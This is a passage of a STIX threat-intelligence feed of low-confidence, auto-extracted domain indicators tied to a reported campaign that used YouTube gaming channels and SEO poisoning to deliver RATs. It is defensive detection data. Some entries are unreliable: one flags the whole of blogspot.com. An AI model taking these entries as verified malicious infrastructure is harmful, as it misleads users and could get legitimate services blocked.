News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--356c6a6a-f429-4a55-9c96-241f777dd2eb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: archairport.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]","pattern":"[domain-name:value = 'archairport.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a5b474bd-fb34-41be-8907-a4da9e8d6b55","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: armcard.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz","pattern":"[domain-name:value = 'armcard.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c0031884-48f0-462e-a29c-36d27f4c17f9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: atthelake.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[","pattern":"[domain-name:value = 'atthelake.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d13934b9-41d5-4d97-ab9a-aafb4b3ecc01","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: authoritykittens.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba","pattern":"[domain-name:value = 'authoritykittens.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36158472-7de8-43de-bc64-c52379030b4b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: babyvein.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz","pattern":"[domain-name:value = 'babyvein.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f07412d8-9d2c-4756-985e-771568f599d3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: badgeterritory.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con","pattern":"[domain-name:value = 'badgeterritory.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c71f3a43-d202-4b97-8cca-51d933c8176f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: badgewing.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[","pattern":"[domain-name:value = 'badgewing.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d386df77-33f9-4bf2-b1b3-ab7cffe2ef13","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bagcare.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo","pattern":"[domain-name:value = 'bagcare.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b896d98-a4ff-4dd4-8d26-82f8a1f789c0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: baitmetal.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz","pattern":"[domain-name:value = 'baitmetal.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c85d5315-8b80-437e-b450-db87465d7b4e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: basesfile.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor","pattern":"[domain-name:value = 'basesfile.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--584a762a-09ac-484d-bdbf-6da06c582629","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: basesfiles.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace","pattern":"[domain-name:value = 'basesfiles.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aa43803e-ea57-403f-b7de-fe6421b9b492","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: basinpleasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir","pattern":"[domain-name:value = 'basinpleasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0cdf2057-031d-4b46-8418-676db1415905","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: basketballyear.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture","pattern":"[domain-name:value = 'basketballyear.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--af3a7521-37fb-419a-b500-a6760dba14bd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: baskethumor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro","pattern":"[domain-name:value = 'baskethumor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e566f954-4d56-42c6-815b-18072c32b02b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bedroomdesire.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke","pattern":"[domain-name:value = 'bedroomdesire.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffb85abd-4364-449d-b9c6-5c9460724973","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: beefteeth.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy","pattern":"[domain-name:value = 'beefteeth.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ae56cbd-c287-4164-9517-26a0855d7fac","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: beliefpicture.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag","pattern":"[domain-name:value = 'beliefpicture.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a84a9f0-210a-4807-8b98-d6e6726293b2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: believesisters.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x","pattern":"[domain-name:value = 'believesisters.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a4cb2983-a05c-4985-9ea5-9476ccfee3a4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bellplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[","pattern":"[domain-name:value = 'bellplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a70b9101-06b3-471f-a49e-1bf87f43d10d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bikesdonkey.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick","pattern":"[domain-name:value = 'bikesdonkey.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66c643ab-2e17-4568-8dd7-bf2582070509","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: birthdaymagic.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]","pattern":"[domain-name:value = 'birthdaymagic.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--77a798f3-6a01-425a-869b-c214a1120f34","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: blogspot.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx","pattern":"[domain-name:value = 'blogspot.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dffc82db-6827-42bb-9738-f885b7f81313","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: boardmagic.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in","pattern":"[domain-name:value = 'boardmagic.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d769c3c0-c899-4e66-b1af-80485a7f7daf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: boatthought.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[","pattern":"[domain-name:value = 'boatthought.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b89329c6-7f6c-456b-b199-58d73d7883fa","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: boundarychickens.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy","pattern":"[domain-name:value = 'boundarychickens.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d51e1c12-9679-42a9-a5fb-a8a6306486a0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: boundaryfly.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz","pattern":"[domain-name:value = 'boundaryfly.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f17e6c9-01c9-437c-aaaf-2aa961e98d14","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: boytank.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.","pattern":"[domain-name:value = 'boytank.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1853f4b-cba0-434a-9f1f-132c051e70e3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: branchmorning.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[","pattern":"[domain-name:value = 'branchmorning.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eea8ac75-61c6-4f13-9c44-49bf2e301303","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: breathdoctor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ndarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.","pattern":"[domain-name:value = 'breathdoctor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2e64039-bca7-4a0c-99a7-e88a695d9b1b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bubbleappliance.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; co","pattern":"[domain-name:value = 'bubbleappliance.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6356055c-f596-4e73-9f01-f5bbda524d05","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bubbleslip.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]","pattern":"[domain-name:value = 'bubbleslip.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--246a88c4-e536-45ca-8f37-e2f3826c0588","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cabbagemeasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: anchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz","pattern":"[domain-name:value = 'cabbagemeasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--44bc7b39-febd-4534-b7a0-27d84cb06675","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cablecanvas.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: athdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz","pattern":"[domain-name:value = 'cablecanvas.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c081277b-3fcc-4007-9d5a-554774fc1454","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cableland.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz","pattern":"[domain-name:value = 'cableland.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6715971-634c-4696-82fe-1f0adda0a56a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cardgrape.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: bbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; 